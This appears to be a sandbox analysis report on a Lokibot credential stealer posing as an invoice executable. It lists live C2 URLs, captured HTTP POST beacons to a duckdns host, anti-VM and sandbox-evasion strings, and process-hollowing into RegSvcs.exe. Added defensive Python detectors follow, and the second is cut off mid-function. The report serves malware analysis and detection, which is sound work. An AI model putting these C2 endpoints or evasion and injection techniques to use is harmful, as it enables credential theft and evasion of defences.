Windows Analysis Report: Invoice and BL.exe

Overview

General Information

Sample Name: Invoice and BL.exe
Analysis ID: 458970
MD5: 3c7b342067f6142e6ed45551f5f60c50
SHA1: d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
SHA256: 419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
Tags: exe, Loki
Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • Invoice and BL.exe (PID: 1152 cmdline: 'C:\Users\user\Desktop\Invoice and BL.exe' MD5: 3C7B342067F6142E6ED45551F5F60C50)
    • RegSvcs.exe (PID: 5412 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  Strings:
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
(13 entries in the full report; only the entries above are shown.)

Unpacked PEs

Source | Rule | Description | Author
0.2.Invoice and BL.exe.397e408.3.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  Strings:
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
0.2.Invoice and BL.exe.397e408.3.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.Invoice and BL.exe.397e408.3.unpack | Loki_1 | Loki Payload | kevoreilly
  Strings:
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
0.2.Invoice and BL.exe.397e408.3.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(15 entries in the full report; only the entries above are shown.)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for domain / URL
Source: abixmaly.duckdns.org | Virustotal: Detection: 10%
Source: http://abixmaly.duckdns.org/binge/fre.php | Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Invoice and BL.exe | Virustotal: Detection: 59%
Source: Invoice and BL.exe | Metadefender: Detection: 31%
Source: Invoice and BL.exe | ReversingLabs: Detection: 60%
Machine Learning detection for sample
Source: Invoice and BL.exe | Joe Sandbox ML: detected
Source: Invoice and BL.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Invoice and BL.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Uses dynamic DNS services
Source: unknown | DNS query: name: abixmaly.duckdns.org
Source: Joe Sandbox View | IP Address: 192.169.69.26
Source: Joe Sandbox View | ASN Name: WOWUS
Source: global traffic | HTTP traffic detected:
  POST /binge/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: abixmaly.duckdns.org
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: D82FEB54
  Content-Length: 190
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /binge/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: abixmaly.duckdns.org
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: D82FEB54
  Content-Length: 163
  Connection: close
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00404ED4 recv
Source: unknown | DNS traffic detected: queries for: abixmaly.duckdns.org
Source: unknown | HTTP traffic detected:
  POST /binge/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: abixmaly.duckdns.org
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: D82FEB54
  Content-Length: 190
  Connection: close
Source: RegSvcs.exe, 00000007.00000002.294776027.0000000000F64000.00000004.00000020.sdmp | String found in binary or memory: http://abixmaly.duckdns.org/binge/fre.php
Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmp | String found in binary or memory: http://abixmaly.duckdns.org/binge/fre.phpNg

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload, Author: kevoreilly
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: Invoice and BL.exe, NodeGraphControl/NodeGraphNode.cs | Long String: Length: 24686
Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.cs | Long String: Length: 24686
Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.cs | Long String: Length: 24686
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Invoice and BL.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00405B6F appears 42 times
Source: Invoice and BL.exe, 00000000.00000002.290027759.00000000039B8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs Invoice and BL.exe
Source: Invoice and BL.exe, 00000000.00000002.288539858.00000000003F4000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
Source: Invoice and BL.exe, 00000000.00000002.298627197.0000000008520000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs Invoice and BL.exe
Source: Invoice and BL.exe, 00000000.00000002.289489186.0000000002ACA000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameResource_Meter.dll> vs Invoice and BL.exe
Source: Invoice and BL.exe | Binary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
Source: Invoice and BL.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/3@3/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
Source: C:\Users\user\Desktop\Invoice and BL.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.log
Source: C:\Users\user\Desktop\Invoice and BL.exe | Mutant created: \Sessions\1\BaseNamedObjects\qnrJUclcstb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: Invoice and BL.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Invoice and BL.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Invoice and BL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Invoice and BL.exe | Virustotal: Detection: 59%
Source: Invoice and BL.exe | Metadefender: Detection: 31%
Source: Invoice and BL.exe | ReversingLabs: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\Invoice and BL.exe 'C:\Users\user\Desktop\Invoice and BL.exe'
Source: C:\Users\user\Desktop\Invoice and BL.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Users\user\Desktop\Invoice and BL.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: Invoice and BL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Invoice and BL.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe

Data Obfuscation:

.NET source code contains potential unpacker
Source: Invoice and BL.exe, NodeGraphControl/frmGiris.cs | .Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs | .Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs | .Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Yara detected aPLib compressed binary
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD2A48 push esp; iretd
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD67A6 push esp; retf 0021h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00402AC0 push eax; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.07527531972
Source: C:\Users\user\Desktop\Invoice and BL.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX (SetErrorMode flag SEM_NOGPFAULTERRORBOX, suppresses the Windows Error Reporting crash dialog; 115 identical entries)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match	File source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\Invoice and BL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Invoice and BL.exe TID: 908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\Invoice and BL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 60000
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Invoice and BL.exe	Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041289A LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040317B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402B7C GetProcessHeap,RtlAllocateHeap,
Source: C:\Users\user\Desktop\Invoice and BL.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory allocated: page read and write | page guard
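The evasion findings above are string hits in the first-stage process memory (SbieDll.dll for Sandboxie, wine_get_unix_file_name for Wine, the VMware Tools registry key and install path, the SCSI DEVICEMAP key used to read the disk vendor string) plus a relative delay of 922337203685477 ms, which is roughly 29,000 years and exists only to stall a sandbox that does not fast-forward sleeps. The scanner below is an added example written for this page, not part of the Joe Sandbox report or of the sample. It walks a memory blob for those indicators in both ASCII and UTF-16LE, because a .NET loader such as Invoice and BL.exe keeps System.String data as UTF-16LE and an ASCII-only grep misses it. The blob it scans is constructed inline to stand in for a process dump.

```python
"""Scan a process-memory blob for the sandbox/VM indicator strings listed in
the report, in both ASCII and UTF-16LE. Added example, not report code."""
import re

# Indicator strings taken from the memory findings above, with what each one reveals.
INDICATORS = {
    "SBIEDLL.DLL": "Sandboxie user-mode hook DLL loaded in the process",
    "WINE_GET_UNIX_FILE_NAME": "Wine-only kernel32 export (running under Wine)",
    "SOFTWARE\\VMware, Inc.\\VMware Tools": "VMware Tools registry key",
    "C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\": "VMware Tools install path",
    "VMware SVGA II": "VMware display adapter name",
    "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0":
        "SCSI device map key (disk vendor string lookup)",
    "SYSTEM\\ControlSet001\\Services\\Disk\\Enum": "disk enumeration key (vendor string lookup)",
}

# The relative delay the report shows, in milliseconds.
HUGE_DELAY_MS = 922337203685477
MS_PER_YEAR = 1000 * 60 * 60 * 24 * 365.25


def delay_years(ms: int) -> float:
    """Express a millisecond delay in years, to show how absurd the reported value is."""
    return ms / MS_PER_YEAR


def _patterns():
    """Yield (compiled_pattern, indicator, encoding_label, description) for both encodings."""
    for text, why in INDICATORS.items():
        for enc, label in (("ascii", "ascii"), ("utf-16-le", "utf16")):
            # re.escape on bytes keeps the interleaved NULs of UTF-16LE as literals;
            # IGNORECASE handles the mixed-case variants seen in the report (vmware/VMWARE).
            yield re.compile(re.escape(text.encode(enc)), re.IGNORECASE), text, label, why


def scan_memory(blob: bytes):
    """Return a sorted list of (offset, indicator, encoding_label, description) hits."""
    hits = []
    for pat, text, label, why in _patterns():
        for m in pat.finditer(blob):
            hits.append((m.start(), text, label, why))
    hits.sort()
    return hits


def build_sample_blob() -> bytes:
    """Constructed stand-in for a memory dump: filler bytes around a few indicators,
    some stored as ASCII and some as UTF-16LE, the way a .NET process would hold them."""
    return (
        b"\x00" * 16
        + "SOFTWARE\\VMware, Inc.\\VMware Tools".encode("utf-16-le")
        + b"\x00" * 8
        + b"SbieDll.dll"
        + b"\x00" * 8
        + "wine_get_unix_file_name".encode("utf-16-le")
        + b"\x00" * 8
        + b"unrelated filler bytes"
    )


if __name__ == "__main__":
    for off, text, enc, why in scan_memory(build_sample_blob()):
        print(f"0x{off:06x} {enc:5} {text!r}  # {why}")
    print(f"reported delay {HUGE_DELAY_MS} ms is about {delay_years(HUGE_DELAY_MS):,.0f} years")
```

Run it against a real dump with `scan_memory(open("dump.bin", "rb").read())`; a hit on the UTF-16 side with none on the ASCII side is the usual signature of a managed (.NET) stage carrying the checks.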

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000
Source: C:\Users\user\Desktop\Invoice and BL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA2008
Source: C:\Users\user\Desktop\Invoice and BL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
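The write pattern above is the process-hollowing sequence: the .NET loader creates the legitimate, Microsoft-signed RegSvcs.exe (the earlier "Creates a process in suspended mode" finding), writes a PE header (4D5A, "MZ") at 0x400000, then fills the sections at 0x401000, 0x415000 and 0x41A000, with two more writes at 0x4A0000 and 0xBA2008 whose contents the report does not show. The detector below is an added example for this page, not report code and not the sample's code. It consumes a stream of process-create and cross-process-write events shaped like these findings and flags a foreign write whose buffer begins with "MZ" at a child's image base as hollowing, while ignoring a process writing into its own address space. The event list is constructed here to mirror the report; the child PID 2484 and the byte contents of the section writes are made up, since the report gives neither.

```python
"""Flag process hollowing from process-create and memory-write events.
Added example mirroring the report's findings, not report or sample code."""
from dataclasses import dataclass, field

MZ = b"MZ"  # 4D5A, the DOS header magic the report saw at base 0x400000


@dataclass
class ProcessState:
    image: str
    parent_pid: int
    writes: list = field(default_factory=list)  # (base, first two bytes)


def analyze(events):
    """events: dicts of the form
         {"type": "create", "pid", "ppid", "image", "suspended": bool}
         {"type": "write", "pid" (writer), "target_pid", "base": int, "data": bytes}
    Returns a list of (target_pid, verdict, detail). Verdicts: info, foreign-write, hollowing."""
    procs = {}
    findings = []
    for ev in events:
        if ev["type"] == "create":
            procs[ev["pid"]] = ProcessState(ev["image"], ev["ppid"])
            if ev.get("suspended"):
                findings.append((ev["pid"], "info",
                                 f"{ev['image']} created suspended by pid {ev['ppid']}"))
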